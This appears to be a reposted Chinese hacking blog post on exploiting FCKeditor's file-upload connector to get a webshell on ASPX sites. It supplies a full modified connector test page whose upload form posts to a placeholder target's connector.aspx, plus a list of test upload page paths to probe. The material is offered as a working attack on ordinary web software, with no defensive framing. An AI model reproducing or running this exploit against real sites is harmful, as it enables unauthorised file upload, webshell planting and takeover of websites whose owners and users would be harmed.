本文由EnjoyHack原创或转载,转载时请注明出处,详细出处请参考:http://www.enjoyhack.com/article/Unicode/FCKeditor.htmFCKeditor二次上传拿shell算是FCKeditor漏洞集中比较经典的了,这个二次上传前提条件是要支持aspx而且要求FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件为删除。二次上传漏洞对ASPX站点来说利用比较方便,成功率也比较高,当然若是ASP的站点,支持ASPX和文件为删的情况下也是没问题的。在利用二次上传过程中我们往往都是找到FckEditor中的一些test上传页面来进行上传,不过也有遇到test上传页面全部被删除的情况,之前我便遇见过许多,不过在遇到test上传页面被删除的情况下我们可以本地构造上传页谈后提交,前提要确认FckEditor/editor/filemanager/connectors/aspx/connector.aspx文件存在,并且服务器支持ASPX的解析。利用代码:<!--* FCKeditor - The text editor for Internet - http://www.fckeditor.net* Copyright (C) 2003-2007 Frederico Caldeira Knabben** == BEGIN LICENSE ==** Licensed under the terms of any of the following licenses at your* choice:** - GNU General Public License Version 2 or later (the "GPL")* http://www.gnu.org/licenses/gpl.html** - GNU Lesser General Public License Version 2.1 or later (the "LGPL")* http://www.gnu.org/licenses/lgpl.html** - Mozilla Public License Version 1.1 or later (the "MPL")* http://www.mozilla.org/MPL/MPL-1.1.html** == END LICENSE ==** Test page for the File Browser connectors.--><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>FCKeditor - Connectors Tests</title><script type="text/javascript">function BuildBaseUrl( command ){var sUrl =document.getElementById('cmbConnector').value +'?Command=' + command +'&Type=' + document.getElementById('cmbType').value +'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;return sUrl ;}function SetFrameUrl( url ){document.getElementById('eRunningFrame').src = url ;document.getElementById('eUrl').innerHTML = url ;}function GetFolders(){SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;return false ;}function GetFoldersAndFiles(){SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;return false ;}function CreateFolder(){var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;if ( ! sFolder )return false ;var sUrl = BuildBaseUrl( 'CreateFolder' ) ;sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;SetFrameUrl( sUrl ) ;return false ;}function OnUploadCompleted( errorNumber, fileName ){switch ( errorNumber ){case 0 :alert( 'File uploaded with no errors' ) ;break ;case 201 :GetFoldersAndFiles() ;alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;break ;case 202 :alert( 'Invalid file' ) ;break ;default :alert( 'Error on file upload. Error number: ' + errorNumber ) ;break ;}}this.frames.frmUpload = this ;function SetAction(){var sUrl = BuildBaseUrl( 'FileUpload' ) ;document.getElementById('eUrl').innerHTML = sUrl ;document.getElementById('frmUpload').action = sUrl ;}</script></head><body><table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0"><tr><td><table cellspacing="0" cellpadding="0" border="0"><tr><td>Connector:<br /><select id="cmbConnector" name="cmbConnector"><option value="asp/connector.asp" selected="selected">ASP</option><option value="http://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx">ASP.Net</option><option value="cfm/connector.cfm">ColdFusion</option><option value="lasso/connector.lasso">Lasso</option><option value="perl/connector.cgi">Perl</option><option value="php/connector.php">PHP</option><option value="py/connector.py">Python</option></select></td><td></td><td>Current Folder<br /><input id="txtFolder" type="text" value="/" name="txtFolder" /></td><td></td><td>Resource Type<br /><select id="cmbType" name="cmbType"><option value="File" selected="selected">File</option><option value="Image">Image</option><option value="Flash">Flash</option><option value="Media">Media</option><option value="Invalid">Invalid Type (for testing)</option></select></td></tr></table><br /><table cellspacing="0" cellpadding="0" border="0"><tr><td valign="top"><a href="#" Folders</a></td><td></td><td valign="top"><a href="#" Folders and Files</a></td><td></td><td valign="top"><a href="#" Folder</a></td><td></td><td valign="top"><form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">File Upload<br /><input id="txtFileUpload" type="file" name="NewFile" /><input type="submit" value="Upload" /></form></td></tr></table><br />URL: <span id="eUrl"></span></td></tr><tr><td height="100%" valign="top"><iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%"height="100%"></iframe></td></tr></table></body></html><option value="http://www.xxx.com/FckEditor/editor/filemanager/connectors/aspx/connector.aspx">ASP.Net</option>既是ASXP的上传执行路径,asp和php的也同理,需要时请自行补充!!FCKeditor 中test 文件的上传地址FCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/connectors/test.htmlFCKeditor/editor/filemanager/connectors/uploadtest.html
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/458345,如需转载请自行联系原作者